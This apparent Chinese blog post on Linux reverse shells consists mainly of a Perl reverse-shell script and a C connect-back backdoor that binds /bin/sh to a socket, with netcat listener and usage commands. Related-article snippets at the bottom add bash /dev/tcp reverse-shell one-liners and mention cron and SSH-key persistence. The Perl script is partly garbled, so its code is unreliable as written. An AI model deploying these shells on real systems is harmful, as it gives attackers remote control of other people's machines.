linux 反弹脚本,linux 下反弹SHELL

最新推荐文章于 2023-05-17 16:53:40 发布
最新推荐文章于 2023-05-17 16:53:40 发布
阅读量119 收藏
点赞数
文章标签: linux 反弹脚本

linux 下反弹SHELL(一 )

#!/usr/bin/perl

-w # use

strict; use

Socket; use

I:Handle; if($#ARGV+1 !=

2){ print "$#ARGV $0 Remote_IP Remote_Port

\n"; exit 1; } my $remote_ip =

$ARGV[0]; my $remote_port =

$ARGV[1]; my $proto =

getprotobyname("tcp"); my $pack_addr = sockaddr_in($remote_port,

inet_aton($remote_ip)); my $shell = '/bin/bash

-i'; socket(SOCK, AF_INET, SOCK_STREAM,

$proto); STDOUT->autoflush(1); SOCK->autoflush(1); connect(SOCK,$pack_addr) or die "can not

connect:$!"; open STDIN,

"

">&SOCK"; open STDERR,

">&SOCK"; print "Enjoy the

shell.\n"; system($shell); close

SOCK; exit 0; 本机执行netcat.命令

nc -l -p 8080 -vv

远程:

./tcp.pl yourip 8080

perl和bash路径要自己修改,不过一般不用修改的.

文件改为755再运行.否则执行不起来

#include

#include

#include

#include

#include

#include

#include

void usage();

char shell[]="/bin/sh";

char message[]="s8s8 welcome\n";

int sock;

int main(int argc, char *argv[]) {

if(argc <3){

usage(argv[0]);

}

struct sockaddr_in server;

if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {

printf("Couldn't make socket!\n"); exit(-1);

}

server.sin_family = AF_INET;

server.sin_port = htons(atoi(argv[2]));

server.sin_addr.s_addr = inet_addr(argv[1]);

if(connect(sock, (struct sockaddr *)&server,

sizeof(struct sockaddr)) == -1) {

printf("Could not connect to remote shell!\n");

exit(-1);

}

send(sock, message, sizeof(message), 0);

dup2(sock, 0);

dup2(sock, 1);

dup2(sock, 2);

execl(shell,"/bin/sh",(char *)0);

close(sock);

return 1;

}

void usage(char *prog[]) {

printf("\t\ts8s8 connect back

door\n\n");

printf("\t sql@s8s8.net\n\n");

printf("Usage: %s

\n", prog);

exit(-1);

}

gcc -o f f.c

再在本机上监听一个端口

nc -l -p 8888

再执行./f 192.168.1.14 8888

注:反弹回来的 shell没提示符。

测试成功 Linux Freebsd

weixin_39902107
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux反弹shell
谢公子的博客
11-29 9298
目录 Bash反弹shell Python反弹shell 其他命令反弹shell 写入命令到定时任务文件 写入SSH公钥 写入/etc/profile文件 当我们可以在远程Linux主机上执行任意命令或写入任意数据到任意文件的时候,我们通常会通过以下方式控制远程主机。 Bash反弹shell Linux 反弹 shell 使用下面这条命令,该命令弹回来的shell是不可交互的,...
Linux反弹命令
qq_64332865的博客
11-27 1718
反弹shell 反弹shell的含义:反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 反弹shell需要用到哪里,通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。 2.目标机器的ip动态改变,你不能持续控制。 3.由于防火
linux反弹shell
afjkslahdfkaJDHU的博客
11-26 2408
0x01. bash 在攻击主机上执行端口监听: nc -lvvp port //port 为攻击主机端口号,并且此端口号没有被占用 在目标主机上执行: bash -i >& /dev/tcp/攻击主机ip/port 0>&1 //port 为攻击主机端口号 解释: bash -i 打开一个交互的bash >& 将标准错误输出重定向到标准输出 /dev/tcp/x.x...
Linux常用的反弹shell命令
m0_63200360的博客
04-24 2578
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell?通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。
LINUX shell反弹篇(一)
胖虎的博客
10-26 2094
linuxshell反弹的方法及原理
Linux下几种反弹Shell方法的总结与理解(利用bash脚本
weixin_43803070的博客
07-10 2142
之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上,下面来介绍分析几种常用的方法。 实验环境: CentOS 6.5:192.168...
浅析Linux之bash反弹shell原理
01-08
反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口...
linux-ReverseShellasaService反弹shell即服务
08-13
Linux环境中,"Reverse Shell as a Service"(反弹shell即服务)是一种安全研究中的技术,主要用于渗透测试和漏洞利用场景。反弹shell允许攻击者在远程系统上获得命令执行的通道,从而控制目标系统。这种技术通常...
反弹shell1
08-03
4. **Lua脚本反弹Shell** Lua是一种轻量级的脚本语言,可用于创建TCP连接并执行命令。示例代码展示了如何在Linux和Windows系统上使用Lua建立TCP连接,并通过连接执行命令。 5. **Meterpreter和Shellcode** `...
Linux下非交互式提权详解
09-15
在无法反弹shell的情况下,这种方法尤为实用,因为它允许在没有交互环境的情况下运行提权工具并检查结果。 首先,文章中提到了一个简单的PHP脚本`proce_open()`,这个脚本接收两个参数:提权工具的绝对路径和需要...
Linux反弹shell姿势复现(二)--- 利用下载的工具执行反弹(busybox)
weixin_44283446的博客
04-06 1916
Linux反弹shell姿势复现(二)--- 利用下载工具执行反弹(busybox)前言复现环境说明利用下载工具执行反弹(busybox)什么是busybox?方法一方法二 前言 本博文仅供学习反弹shell的姿势使用,勿作其他用途的参考! 复现环境说明 服务端(被监听)(ubuntu使用cat /proc/version查看,centos使用cat /etc/system-release查看):ubuntu 5.4.0-67-generic; centos:CentOS Linux release
常用的反弹shell脚本
weixin_30606461的博客
12-07 127
bash shell反弹脚本 /bin/bash -i > /dev/tcp/10.211.55.11/443 0<&1 2>&1 Python shell 反弹脚本 #!/usr/bin/python # This is a Python reverse shell script import socket,subprocess,...
用Perl写的反弹Shell [转]
stonesharp的专栏
12-31 2851
用Perl写的反弹Shell [转] 说明:这个反弹shell的代码来自 anonymouslogin 的百度空间,无意中看到,用于Linux下面,和以前我在POC上看到的一个 comeback.pl代码很像很像    本人暂时没有测试 手头没有的Linux机子... 代码是我自己加上去的 laiwei@debian:~$ cat rebound.pl           
Linux简单渗透、反弹shell、常见脚本反弹方法
zhao__b的博客
11-26 2302
Linux简单渗透 这是我在课堂上做的一个小实验,首先电脑要有Java软件,没有去电脑管家下载一个,用于后期渗透。 第一步:打开软件点击管理,会出现让我们生成的界面,密码、密钥可以改,自己记住就行,这里我用的默认,有效载荷更具自己需求更改,这里我用的php,然后点击生成。 第二步:点击生成后会让我们选择一个存放文件地址,更具自己想放那放那,然后会在存放文件里生成一个php文件,右击我们用notepad++(这里我用的是notepad++)打开可以看到文件里的内容。 第三步:把刚才..
渗透测试中的 Go 语言使用:编写反弹后门 Hershell
a13161333486的博客
05-07 2712
  介绍  在渗透测试过程中,一个必备的工具是众所周知的、超级棒的Metasploit框架。  该环境包含大量的payload、编码器和其他工具。在这些payload中Meterpreter有重要意义:它是一个经过开发和后开发命令的修改版的shell。由于其强大的攻击特性,该shell可能是最常用到的。  Meterpreter的问题  不幸的是,Meterpreter的流行有一个缺点:大多数反病...
经验分享 | 常用linux反弹shell合集
Uguardsec的博客
01-25 927
一、前言 当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句 来达到我们的目的。 二、反弹方法 攻击机:192.168.3.43 靶机:192.168.1.21 、192.168.249.12 1. Bash反弹 1.1 方法一 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/x.x.x.x/port 0
Linux指令学习
m0_56810453的博客
01-07 198
自学记录
Linux基础
HahAPhiK的博客
06-13 672
Linux下自带渗透方面的命令一.ldap渗透技巧(LDAP是轻量目录访问协议,它是基于X.500标准的,但是简单多了并且可以根据需要定制。与X.500不同,LDAP支持TCP/IP,这对访问Internet是必须的。)1.cat /etc/nsswitch看看密码登录策略我们可以看到使用了file ldap模式2.less /etc/ldap.confbase ou=People,dc=unix...
【安全知识】——LInuxshell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 6038
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
40个简单但有效的Linux Shell脚本示例.docx
最新发布
11-16
"40个简单但有效的Linux Shell脚本示例" 在Linux环境中,shell脚本是一种强大的工具,能够自动化日常任务,提高工作效率。本文档提供了40个实用的Linux Shell脚本示例,涵盖了从基础到进阶的各种功能。以下是其中的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值